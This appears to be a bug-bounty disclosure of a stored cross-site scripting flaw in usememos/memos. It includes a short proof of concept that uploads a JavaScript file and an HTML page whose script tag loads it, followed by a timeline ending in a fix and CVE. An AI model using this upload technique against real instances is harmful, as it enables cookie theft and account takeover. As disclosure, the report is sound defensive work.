Stored XSS using two files in usememos/memos

Valid

Reported on

Jan 2nd 2023

Description

I uploaded two files (first => js , second => html) the first was js files with malicious script and get it's url and i added it to the second one as source for the script tag

Proof of Concept

// test.js
alert("xss");

and assume its url => https://demo.usememos.com/o/r/9/test.js

// test.html
<html>
<!-- src= "test.js path" -->
<script src="https://demo.usememos.com/o/r/9/test.js"></script>

<body>
hello world
</body>
</html>

there is a POC video

https://drive.google.com/file/d/1CEwSLczldBuKZBsVH-FtDKOBcZB4GysE/view?usp=share_link

Impact

If exploited, this vulnerability could allow an attacker to steal sensitive information, such as login credentials , from users visiting the affected website, so Account takeover via steal cookies

Occurrences

We are processing your report and will contact the usememos/memos team within 24 hours. 7 days ago
Mahmoud Mosbah modified the report
7 days ago
Mahmoud Mosbah modified the report
7 days ago
We have contacted a member of the usememos/memos team and are waiting to hear back 6 days ago
STEVEN validated this vulnerability 5 days ago
Mahmoud Mosbah has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
STEVEN marked this as fixed in 0.10.0 with commit 46c13a 3 days ago
STEVEN has been awarded the fix bounty
This vulnerability has been assigned a CVE
STEVEN published this vulnerability 3 days ago
memo.go#L346 has been validated
to join this conversation